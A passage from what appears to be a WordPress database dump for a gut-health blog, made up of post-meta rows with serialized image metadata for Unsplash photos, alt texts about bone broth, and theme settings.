";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:34:\"jon-tyson-quRbjNp-WQA-unsplash.jpg\";}'),(14348,5466,'_wp_attachment_image_alt','Bone broth for gut health'),(14363,5466,'portfolio_single_masonry_image_size','large-width-height'),(14351,5464,'_thumbnail_id','5466'),(14352,5464,'_edit_last','1'),(14353,5464,'qodef_page_content_behind_header_meta','no'),(14354,5464,'qodef_boxed_background_image_attachment_meta','fixed'),(14355,5464,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14356,5464,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14357,5464,'qodef_video_type_meta','social_networks'),(14358,5464,'qodef_audio_type_meta','social_networks'),(14359,5464,'qodef_post_skin','qodef-post-light-skin'),(14360,5464,'qodef_disable_vertical_header_background_image_meta','no'),(14361,5464,'qodef_disable_header_widget_logo_area_meta','no'),(14362,5464,'qodef_disable_header_widget_menu_area_meta','no'),(14364,5466,'image_gallery_masonry_image_size','qodef-large-masonry-item'),(14370,5473,'_edit_lock','1696926901:3'),(14369,5472,'_edit_lock','1696932697:1'),(14371,5474,'_wp_attached_file','2023/09/akshay-chauhan-Z5_lZsqMDJU-unsplash-1-scaled.jpg'),(14372,5474,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1440;s:6:\"height\";i:2560;s:4:\"file\";s:56:\"2023/09/akshay-chauhan-Z5_lZsqMDJU-unsplash-1-scaled.jpg\";s:8:\"filesize\";i:210991;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7720;}s:5:\"large\";a:5:{s:4:\"file\";s:50:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47514;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:49:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4148;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-768x1365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75095;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-864x1536.jpg\";s:5:\"width\";i:864;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90268;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:51:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-1152x2048.jpg\";s:5:\"width\";i:1152;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144472;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:49:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24102;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:50:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39156;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:50:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49447;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:51:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69584;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:41:\"akshay-chauhan-Z5_lZsqMDJU-unsplash-1.jpg\";}'),(14387,5476,'_wp_attached_file','2023/09/michal-parzuchowski-7TWRwDjfGew-unsplash-scaled.jpg'),(14375,5472,'_thumbnail_id','5468'),(14376,5472,'_edit_last','1'),(14377,5472,'qodef_page_content_behind_header_meta','no'),(14378,5472,'qodef_boxed_background_image_attachment_meta','fixed'),(14379,5472,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14380,5472,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14381,5472,'qodef_video_type_meta','social_networks'),(14382,5472,'qodef_audio_type_meta','social_networks'),(14383,5472,'qodef_post_skin','qodef-post-light-skin'),(14384,5472,'qodef_disable_vertical_header_background_image_meta','no'),(14385,5472,'qodef_disable_header_widget_logo_area_meta','no'),(14386,5472,'qodef_disable_header_widget_menu_area_meta','no'),(14388,5476,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1709;s:4:\"file\";s:59:\"2023/09/michal-parzuchowski-7TWRwDjfGew-unsplash-scaled.jpg\";s:8:\"filesize\";i:358385;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"michal-parzuchowski-7TWRwDjfGew-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12744;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"michal-parzuchowski-7TWRwDjfGew-unsplash-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88483;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"michal-parzuchowski-7TWRwDjfGew-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7992;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"michal-parzuchowski-7TWRwDjfGew-unsplash-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56861;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"michal-parzuchowski-7TWRwDjfGew-unsplash-1536x1026.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1026;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164060;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:54:\"michal-parzuchowski-7TWRwDjfGew-unsplash-2048x1367.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1367;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:253937;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:52:\"michal-parzuchowski-7TWRwDjfGew-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59196;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:53:\"michal-parzuchowski-7TWRwDjfGew-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91077;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:53:\"michal-parzuchowski-7TWRwDjfGew-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105659;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:54:\"michal-parzuchowski-7TWRwDjfGew-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161132;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:44:\"michal-parzuchowski-7TWRwDjfGew-unsplash.jpg\";}'),(14405,5479,'_wp_attached_file','2023/09/kadir-celep-qFpTSS7BSuM-unsplash-1.jpg'),(14404,5473,'footnotes',''),(14391,5473,'_thumbnail_id','5502'),(14392,5473,'_edit_last','3'),(14393,5473,'qodef_page_content_behind_header_meta','no'),(14394,5473,'qodef_boxed_background_image_attachment_meta','fixed'),(14395,5473,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/michal-parzuchowski-7TWRwDjfGew-unsplash-scaled.jpg'),(14396,5473,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14397,5473,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14398,5473,'qodef_video_type_meta','social_networks'),(14399,5473,'qodef_audio_type_meta','social_networks'),(14400,5473,'qodef_post_skin','qodef-post-light-skin'),(14401,5473,'qodef_disable_vertical_header_background_image_meta','no'),(14402,5473,'qodef_disable_header_widget_logo_area_meta','no'),(14403,5473,'qodef_disable_header_widget_menu_area_meta','no'),(14406,5479,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:761;s:6:\"height\";i:1200;s:4:\"file\";s:46:\"2023/09/kadir-celep-qFpTSS7BSuM-unsplash-1.jpg\";s:8:\"filesize\";i:356840;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-1-190x300.jpg\";s:5:\"width\";i:190;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14957;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-1-649x1024.jpg\";s:5:\"width\";i:649;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116240;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8155;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73656;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-1-761x550.jpg\";s:5:\"width\";i:761;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115646;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106232;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-1-761x1100.jpg\";s:5:\"width\";i:761;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162405;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14421,5482,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1768;s:6:\"height\";i:2560;s:4:\"file\";s:53:\"2023/09/kadir-celep-qFpTSS7BSuM-unsplash-2-scaled.jpg\";s:8:\"filesize\";i:622288;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-2-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16188;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-2-707x1024.jpg\";s:5:\"width\";i:707;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133603;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8106;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-2-768x1112.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1112;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:152792;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:48:\"kadir-celep-qFpTSS7BSuM-unsplash-2-1061x1536.jpg\";s:5:\"width\";i:1061;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:262824;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:48:\"kadir-celep-qFpTSS7BSuM-unsplash-2-1415x2048.jpg\";s:5:\"width\";i:1415;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:426035;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:46:\"kadir-celep-qFpTSS7BSuM-unsplash-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75474;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156832;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:47:\"kadir-celep-qFpTSS7BSuM-unsplash-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116855;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:48:\"kadir-celep-qFpTSS7BSuM-unsplash-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243917;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:38:\"kadir-celep-qFpTSS7BSuM-unsplash-2.jpg\";}'),(14409,5472,'footnotes',''),(14420,5482,'_wp_attached_file','2023/09/kadir-celep-qFpTSS7BSuM-unsplash-2-scaled.jpg'),(14430,5485,'_wp_attached_file','2023/09/broth-scaled.jpg'),(14431,5485,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1577;s:6:\"height\";i:2560;s:4:\"file\";s:24:\"2023/09/broth-scaled.jpg\";s:8:\"filesize\";i:549612;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"broth-185x300.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14615;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"broth-631x1024.jpg\";s:5:\"width\";i:631;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117657;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"broth-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8159;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"broth-768x1247.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1247;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163438;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"broth-946x1536.jpg\";s:5:\"width\";i:946;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:232516;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:19:\"broth-1262x2048.jpg\";s:5:\"width\";i:1262;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:375547;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:17:\"broth-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77071;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:18:\"broth-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155777;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:18:\"broth-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111198;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:19:\"broth-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247305;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:9:\"broth.jpg\";}'),(14440,5468,'_wp_attachment_image_alt','Bone broth to heal gut'),(14444,5486,'_edit_lock','1696928126:3'),(14443,5472,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/kadir-celep-qFpTSS7BSuM-unsplash-scaled.jpg'),(14445,5487,'_wp_attached_file','2023/09/rasa-kasparaviciene-0TFxOkhFt14-unsplash-scaled.jpg'),(14446,5487,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1666;s:4:\"file\";s:59:\"2023/09/rasa-kasparaviciene-0TFxOkhFt14-unsplash-scaled.jpg\";s:8:\"filesize\";i:594591;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18023;}s:5:\"large\";a:5:{s:4:\"file\";s:53:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-1024x666.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:666;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8335;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-768x500.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82842;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:54:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-1536x1000.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:257385;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:54:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-2048x1333.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:411803;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:52:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64412;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:53:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124473;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:53:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96342;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:54:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195386;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:44:\"rasa-kasparaviciene-0TFxOkhFt14-unsplash.jpg\";}'),(14462,5489,'_edit_lock','1696947526:3'),(14449,5486,'_thumbnail_id','5487'),(14450,5486,'_edit_last','3'),(14451,5486,'qodef_page_content_behind_header_meta','no'),(14452,5486,'qodef_boxed_background_image_attachment_meta','fixed'),(14453,5486,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/rasa-kasparaviciene-0TFxOkhFt14-unsplash-scaled.jpg'),(14454,5486,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14455,5486,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14456,5486,'qodef_video_type_meta','social_networks'),(14457,5486,'qodef_audio_type_meta','social_networks'),(14458,5486,'qodef_post_skin','qodef-post-light-skin'),(14459,5486,'qodef_disable_vertical_header_background_image_meta','no'),(14460,5486,'qodef_disable_header_widget_logo_area_meta','no'),(14461,5486,'qodef_disable_header_widget_menu_area_meta','no'),(14463,5490,'_wp_attached_file','2023/09/emmanuel-olguin-WgyUYag2H5g-unsplash-scaled.jpg'),(14464,5490,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1707;s:4:\"file\";s:55:\"2023/09/emmanuel-olguin-WgyUYag2H5g-unsplash-scaled.jpg\";s:8:\"filesize\";i:413190;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"emmanuel-olguin-WgyUYag2H5g-unsplash-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9275;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"emmanuel-olguin-WgyUYag2H5g-unsplash-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83429;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"emmanuel-olguin-WgyUYag2H5g-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4372;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"emmanuel-olguin-WgyUYag2H5g-unsplash-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49161;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:50:\"emmanuel-olguin-WgyUYag2H5g-unsplash-1536x1024.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:170121;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:50:\"emmanuel-olguin-WgyUYag2H5g-unsplash-2048x1365.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:281323;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:48:\"emmanuel-olguin-WgyUYag2H5g-unsplash-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39749;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:49:\"emmanuel-olguin-WgyUYag2H5g-unsplash-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77338;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:49:\"emmanuel-olguin-WgyUYag2H5g-unsplash-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69619;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:50:\"emmanuel-olguin-WgyUYag2H5g-unsplash-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135269;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:40:\"emmanuel-olguin-WgyUYag2H5g-unsplash.jpg\";}'),(14467,5489,'_thumbnail_id','5490'),(14468,5489,'_edit_last','3'),(14469,5489,'qodef_page_content_behind_header_meta','no'),(14470,5489,'qodef_boxed_background_image_attachment_meta','fixed'),(14471,5489,'qodef_blog_list_featured_image_meta','http://tummyrevolution.com/wp-content/uploads/2023/09/emmanuel-olguin-WgyUYag2H5g-unsplash-scaled.jpg'),(14472,5489,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14473,5489,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14474,5489,'qodef_video_type_meta','social_networks'),(14475,5489,'qodef_audio_type_meta','social_networks'),(14476,5489,'qodef_post_skin','qodef-post-light-skin'),(14477,5489,'qodef_disable